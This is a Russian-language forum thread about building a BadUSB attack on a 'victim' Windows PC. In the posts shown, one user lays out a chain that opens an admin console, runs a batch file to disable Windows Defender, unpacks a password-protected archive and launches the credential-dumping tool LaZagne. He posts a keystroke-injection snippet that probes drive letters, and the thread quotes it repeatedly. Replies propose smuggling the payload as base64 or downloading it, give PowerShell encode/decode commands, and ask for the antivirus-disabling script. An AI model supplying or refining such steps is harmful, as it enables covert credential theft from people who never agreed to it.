 |
|

07.02.2020, 12:53
|
|
Участник форума
Регистрация: 10.01.2020
Сообщений: 121
С нами:
3337910
Репутация:
0
|
|
нет у них порта usb
|
|
|

02.03.2020, 21:39
|
|
Новичок
Регистрация: 01.03.2020
Сообщений: 0
С нами:
3264287
Репутация:
0
|
|
можно же к AtTiny85 по I2C присоединить любую ардуинку или вообщес STM-32 и к ней уже еспишку и всё. только бутерброд большой получится, но хорошо использовать с платами, которые не могут общаться с компом сами
|
|
|

03.03.2020, 14:16
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
У меня есть bad usb и обычная флешка (далее флешка №1) на которой запароленный .sfx.exe архив с лазаньей и батник на отключение windows defender'а.
суть в том что сначала вставляю в "жертву" обычную флешку, затем bad usb который:
1. открывает cmd от админа
2. заходит на мою флешку №1 и запускает батник для откоючения win defendera
3. разархивирует запараоленный архив
4. запускает лазанью (точнее батник для запуска лазаньи с необходимыми аргументами)
5. закрывает все окна
все.
Проблема в том, что никогда не знаешь какая будет буква у флешки №1.
я решил это как смог, но это фигня какая-то:
Bash:
Код:
Keyboard.print
(
"d:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"e:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"f:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"g:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"h:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"i:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"j:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"k:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
в принципе, этот костыль работает т.к. успешно находит флешку по принципу - последняя из имеющихся букв носителя.
Можно как-то попасть на флешку без этого костыля, указав имя флешки?
|
|
|

03.03.2020, 22:51
|
|
Участник форума
Регистрация: 10.01.2020
Сообщений: 121
С нами:
3337910
Репутация:
0
|
|
Tihon49 сказал(а):
У меня есть bad usb и обычная флешка (далее флешка №1) на которой запароленный .sfx.exe архив с лазаньей и батник на отключение windows defender'а.
суть в том что сначала вставляю в "жертву" обычную флешку, затем bad usb который:
1. открывает cmd от админа
2. заходит на мою флешку №1 и запускает батник для откоючения win defendera
3. разархивирует запараоленный архив
4. запускает лазанью (точнее батник для запуска лазаньи с необходимыми аргументами)
5. закрывает все окна
все.
Проблема в том, что никогда не знаешь какая будет буква у флешки №1.
я решил это как смог, но это фигня какая-то:
Bash:
Код:
Keyboard.print
(
"d:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"e:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"f:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"g:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"h:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"i:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"j:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"k:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
в принципе, этот костыль работает т.к. успешно находит флешку по принципу - последняя из имеющихся букв носителя.
Можно как-то попасть на флешку без этого костыля, указав имя флешки?
Хорошая стратегия, но я бы на Вашем месте реализовал бы определение системы жертвы (код был выше в теме) а потом реализовал атаку
Night MIST сказал(а):
Хорошая стратегия, но я бы на Вашем месте реализовал бы определение системы жертвы (код был выше в теме) а потом реализовал атаку
Вы заточили код под винду, но в современной интерпритации мира это не практично
|
|
|

03.03.2020, 23:17
|
|
Новичок
Регистрация: 05.05.2019
Сообщений: 0
С нами:
3697991
Репутация:
0
|
|
Tihon49 сказал(а):
Можно как-то попасть на флешку без этого костыля, указав имя флешки?
Могу предложить ещё 2 варианта
1. Закодировать sfx архив в base64 строку и после запуска, сохранять его где-то на диске жертвы. (Если, конечно хватит памяти на bad usb, если нет, использовать кардридер)
2. Скачивать этот же архив из интернета.
|
|
|

03.03.2020, 23:32
|
|
Участник форума
Регистрация: 10.01.2020
Сообщений: 121
С нами:
3337910
Репутация:
0
|
|
f22 сказал(а):
Могу предложить ещё 2 варианта
1. Закодировать sfx архив в base64 строку и после запуска, сохранять его где-то на диске жертвы. (Если, конечно хватит памяти на bad usb, если нет, использовать кардридер)
2. Скачивать этот же архив из интернета.
Идея хороша. Есть конкретные предложения по реализации? Микро питон или стандартный код? Я суть понял, но пока не совсем представляю реализацию в коде
|
|
|

03.03.2020, 23:49
|
|
Участник форума
Регистрация: 10.01.2020
Сообщений: 121
С нами:
3337910
Репутация:
0
|
|
Кто не видел- повторюсь (скетч для ардуино и процессора atmega 32u . Скрипт автоматом распознает систему целевой машины и совершает атаку соответственно заранее прописанному алгоритму
)
|
|
|

04.03.2020, 00:11
|
|
Новичок
Регистрация: 05.05.2019
Сообщений: 0
С нами:
3697991
Репутация:
0
|
|
Night MIST сказал(а):
Кто не видел- повторюсь (скетч для ардуино и процессора atmega 32u .)
Стоило, конечно, дать официальный репозиторий ребят. (там модели печатных плат присутствуют) Глядишь, и обновят чего...
joelsernamoreno/BadUSB-Cable
Night MIST сказал(а):
скетч для ардуино и процессора atmega 32u
Точнее не процессор, а микроконтроллер и не atmega, а 8-битный AVR микроконтроллер ATtiny85
Night MIST сказал(а):
Скрипт автоматом распознает систему целевой машины и совершает атаку соответственно заранее прописанному алгоритму
Не совсем корректное описание.
Скрипт, действительно, распознаёт систему, на которой запущен, открывает консоль, вызывает стандартный блокнот и пишет в нём "Hello world".
Алгоритм нужно писать/искать/додумывать самому
Night MIST сказал(а):
Идея хороша. Есть конкретные предложения по реализации? Микро питон или стандартный код? Я суть понял, но пока не совсем представляю реализацию в коде
А какая разница? На выходе обычная строка получается.
Реализация очевидна - после преобразования exe файла в Base64 у тебя получится обычный текст, его загружаешь в ардуину и потом на другом компе конвертируешь обратно.
# encode from binary file to base64txt
powershell -C "& {$outpath = (Join-Path (pwd) 'out_base64.txt'); $inpath = (Join-Path (pwd) 'data.jpg'); [IO.File]::WriteAllText($outpath, ([convert]::ToBase64String(([IO.File]::ReadAllBytes($inpath)))))}"
# decode from base64txt to binary file
powershell -C "& {$outpath = (Join-Path (pwd) 'outdata2.jpg'); $inpath = (Join-Path (pwd) 'out_base64.txt'); [IO.File]::WriteAllBytes($outpath, ([convert]::FromBase64String(([IO.File]::ReadAllText($inpath)))))}"
|
|
|

04.03.2020, 09:25
|
|
Новичок
Регистрация: 10.01.2018
Сообщений: 0
С нами:
4389206
Репутация:
0
|
|
koljan polkin сказал(а):
Все эти плохие ЮСБ так себе игрушки - совсем незаметно их не применишь. У меня есть bashbunny от Hak5 из всего, что он может, мне понравилось только заливка и запуск ехезшника и захват LM хаша. Но не заметит как на мониторе появляются странные окна только юзер-олигофрен.
Ну мне не Пентагон ломать
|
|
|

16.03.2020, 19:33
|
|
Новичок
Регистрация: 15.03.2020
Сообщений: 0
С нами:
3244252
Репутация:
0
|
|
Tihon49 сказал(а):
У меня есть bad usb и обычная флешка (далее флешка №1) на которой запароленный .sfx.exe архив с лазаньей и батник на отключение windows defender'а.
суть в том что сначала вставляю в "жертву" обычную флешку, затем bad usb который:
1. открывает cmd от админа
2. заходит на мою флешку №1 и запускает батник для откоючения win defendera
3. разархивирует запараоленный архив
4. запускает лазанью (точнее батник для запуска лазаньи с необходимыми аргументами)
5. закрывает все окна
все.
Проблема в том, что никогда не знаешь какая будет буква у флешки №1.
я решил это как смог, но это фигня какая-то:
Bash:
Код:
Keyboard.print
(
"d:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"e:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"f:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"g:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"h:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"i:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"j:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
Keyboard.print
(
"k:"
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
200
)
;
typeKey
(
KEY_RETURN
)
;
delay
(
500
)
;
в принципе, этот костыль работает т.к. успешно находит флешку по принципу - последняя из имеющихся букв носителя.
Можно как-то попасть на флешку без этого костыля, указав имя флешки?
Ты не мог бы сказать какой у тебя скрипт на отключение антивируса?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|